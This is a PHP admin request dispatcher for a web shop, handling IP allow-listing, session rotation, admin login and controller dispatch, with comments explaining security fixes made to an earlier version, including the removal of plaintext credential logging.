- <?php
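class AdminDispatcher
{
    /**
     * Idle / rotation window for the admin session, in seconds.
     * (The original comments said "30 minutes"; 2000 s is actually ~33 minutes.)
     */
    const SESSION_TIMEOUT = 2000;

    /**
     * Strip HTML tags and backslash escapes from a raw input value.
     *
     * @param mixed $input Raw value, typically taken from $_GET/$_POST.
     * @return string The cleaned value.
     */
    public static function clearInput($input)
    {
        return stripslashes(strip_tags((string) $input));
    }

    /**
     * Dispatch the current admin request to the matching controller method.
     *
     * Flow: open the DB connection and application context, enforce the admin
     * IP allow-list, redirect query-string URLs to their path form, expire /
     * rotate the session, authenticate the user (HTTP basic auth, then the
     * posted login form), resolve the controller + action from the page info,
     * invoke the action with the request arguments and finally render the
     * admin (or login) layout unless the controller is an AjaxController.
     *
     * @param object $tpl Template engine instance (Smarty-like: display()).
     * @return void Exits the process on 403, on redirects and on a missing controller/action.
     */
    public static function dispatch($tpl)
    {
        // Create connection to db. The variable is kept on purpose: if Connection
        // closes its handle in a destructor, dropping the reference would close it now.
        $conn = new Connection();
        // Create application context
        $application = Application::getInstance();
        $_SESSION["currency"] = new CurrencyCZK();

        // IP allow-list. The original only echoed the 403 and fell through (the
        // die() was commented out), so the check never blocked anything.
        if (!in_array(Application::getClientIp(), Application::getAdminIpList(), true)) {
            header('HTTP/1.1 403 Forbidden');
            LogService::toFile("HTTP/1.1 403 Admin Access Forbidden");
            // The client IP may originate from request headers, so escape it for the HTML body.
            echo htmlspecialchars(Application::getClientIp(), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
                . ": HTTP/1.1 403 Forbidden - The page is not available from your country .";
            exit();
        }

        // Session housekeeping runs before the user is read, so a timed-out session
        // cannot hand back a stale user (assumes getUser() reads $_SESSION - confirm).
        self::refreshSession();

        $user = $application->getUser();
        $page = $application->getPage();
        $requestUri = $_SERVER['REQUEST_URI'] ?? '';

        // Query-string URLs are rewritten to path form and redirected (original behaviour).
        if (strpos($requestUri, "?") !== false) {
            $url = preg_replace(array("/\?.*?\=/", "/\&.*?\=/"), '/', trim($requestUri));
            // Force exactly one leading slash so the Location header can only be a
            // local path, never a protocol-relative "//host/..." target.
            $url = '/' . ltrim($url, '/');
            header("Location: $url");
            exit();
        }

        $page->setMainInfo($requestUri);
        $controllerName = $page->getControllerName();

        // Login authorization
        if (isset($_SERVER['PHP_AUTH_USER'])) {
            $userDao = UserDao::createInstance($_SERVER['PHP_AUTH_USER'], $_SERVER['PHP_AUTH_PW'] ?? '');
            $user = $userDao->authentificateAdmin();
            // The original joined the two role checks with "||", which is true for every
            // user (nobody has both roles) and therefore rejected everyone. A user needs
            // ONE of the two roles.
            if ($user === null
                || ($user->getRole() !== UserRole::$ADMIN_ROLE && $user->getRole() !== UserRole::$WORKER_ROLE)) {
                header("Location: /admin/login");
                exit();
            }
            self::establishLogin($application, $user);
        } elseif (strtolower($controllerName) !== LoginController::CONTROLLER_NAME
            && ($user === null || ($_SESSION["admin"] ?? null) !== "Y")) {
            $username = $_POST["username"] ?? null;
            $password = $_POST["password"] ?? null;
            if ($username === null || $password === null) {
                // Plain unauthenticated page view, not a login attempt: nothing to log.
                header("Location: /admin/login");
                exit();
            }
            $userDao = UserDao::createInstance($username, $password);
            $user = $userDao->authentificateAdmin();
            if ($user === null || !$user->hasAdminAccess()) {
                // Only the submitted user name and source IP are recorded, never the password
                // (the original stored it base64-encoded in the log data).
                self::logLoginAttempt($username, "Login failed");
                header("Location: /admin/login");
                exit();
            }
            self::establishLogin($application, $user);
            self::logLoginAttempt($user->getNick(), "Login successful");
            // The original appended "username:password" in clear text to assets/log.txt
            // here, and then dumped codes from an undefined $codeDao into assets/keys.txt;
            // both writes were removed.
        }

        // Resolve controller class and action name from the page info.
        $controller = $application->getControllerFileFormat($page->getControllerName()) . "Controller";
        $method = $page->getMethod();
        $application->setLanguage(LanguageType::getCzechLanguage());

        if (!file_exists("./controller/admin/$controller.php") || !method_exists($controller, $method)) {
            $cont = new ErrorAdminController();
            $_SESSION["system_error"] = "Nebyla nalezena požadovaná stránka";
            $_SESSION["system_error_trace"] = "Check the specified path: $controller::$method()";
            $cont->setApplication($application);
            $cont->setTemplate($tpl);
            $cont->invoke();
            //show Smarty output
            $tpl->display(TemplateService::INDEX_TEMPLATE);
            exit();
        }

        // create instance of controller and hand it the context + template
        $cont = new $controller;
        $cont->setApplication($application);
        $cont->setTemplate($tpl);

        // Annotations restrict the HTTP verbs an action accepts; no annotation = any verb.
        // empty() is tested first so a null/absent annotation list cannot reach in_array().
        $annotations = Dispatcher::getMethodAnnotation($controller, $method);
        if (empty($annotations) || in_array($_SERVER["REQUEST_METHOD"], $annotations, true)) {
            $args = $page->getParams();
            if ($_SERVER["REQUEST_METHOD"] === "POST") {
                if (!empty($_POST)) {
                    $args = $_POST;
                } else {
                    // Body is not a form: treat it as a JSON document passed as one argument.
                    $json = file_get_contents('php://input');
                    $args[] = json_decode($json, true);
                }
            }
            self::invokeAction($cont, $method, $args);
        }

        if ($cont instanceof AjaxController) {
            return;
        }
        $layout = strtolower($controllerName) === LoginController::CONTROLLER_NAME
            ? AdminTemplateService::LOGIN_LAYOUT
            : AdminTemplateService::ADMIN_LAYOUT;
        $tpl->display($layout);
    }

    /**
     * Expire an idle session and periodically rotate the session id.
     *
     * Idle sessions (no request for SESSION_TIMEOUT seconds) are destroyed and a
     * fresh one is started so later writes in this request still persist; sessions
     * older than SESSION_TIMEOUT get a new id.
     */
    private static function refreshSession()
    {
        $now = time();
        if (isset($_SESSION['LAST_ACTIVITY']) && ($now - $_SESSION['LAST_ACTIVITY'] > self::SESSION_TIMEOUT)) {
            session_unset();    // drop the in-memory $_SESSION data
            session_destroy();  // destroy session data in storage
            // Without a new session nothing written below (user, admin flag) would be saved.
            session_start();
            session_regenerate_id(true);
        }
        $_SESSION['LAST_ACTIVITY'] = $now; // update last activity time stamp
        if (!isset($_SESSION['CREATED'])) {
            $_SESSION['CREATED'] = $now;
        } elseif ($now - $_SESSION['CREATED'] > self::SESSION_TIMEOUT) {
            session_regenerate_id(true); // change session id and invalidate the old one
            $_SESSION['CREATED'] = $now; // update creation time
        }
    }

    /**
     * Mark the session as an authenticated admin session for $user.
     *
     * The session id is rotated first so an id issued before authentication
     * (session fixation) is never promoted to an admin session.
     *
     * @param object $application Application context (setUser()).
     * @param object $user        Authenticated user.
     */
    private static function establishLogin($application, $user)
    {
        session_regenerate_id(true);
        $_SESSION["user"] = $user;
        $_SESSION["admin"] = "Y";
        $application->setUser($user);
    }

    /**
     * Persist an admin login attempt through the AdminLog DAO.
     *
     * @param string $nick    User name as submitted, or the authenticated nick.
     * @param string $message Outcome text, e.g. "Login failed".
     */
    private static function logLoginAttempt($nick, $message)
    {
        $adminLog = new AdminLog();
        $adminLog->setUser($nick);
        $adminLog->setAction("login");
        $adminLog->setMessage($message);
        $adminLog->setData(Application::getClientIp());
        $adminLogDao = DaoFactory::createAdminLogDao();
        $adminLogDao->insert($adminLog);
    }

    /**
     * Call $method on $cont with the request arguments passed positionally.
     *
     * @param object $cont   Controller instance.
     * @param string $method Action name (already verified with method_exists()).
     * @param mixed  $args   Argument array or null; keys are dropped so values are positional.
     */
    private static function invokeAction($cont, $method, $args)
    {
        // The original hand-unrolled arities 0..7 in a switch; unpacking covers every arity
        // and an empty/null argument list is simply a zero-argument call.
        $cont->$method(...array_values((array) $args));
    }
}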
- ?>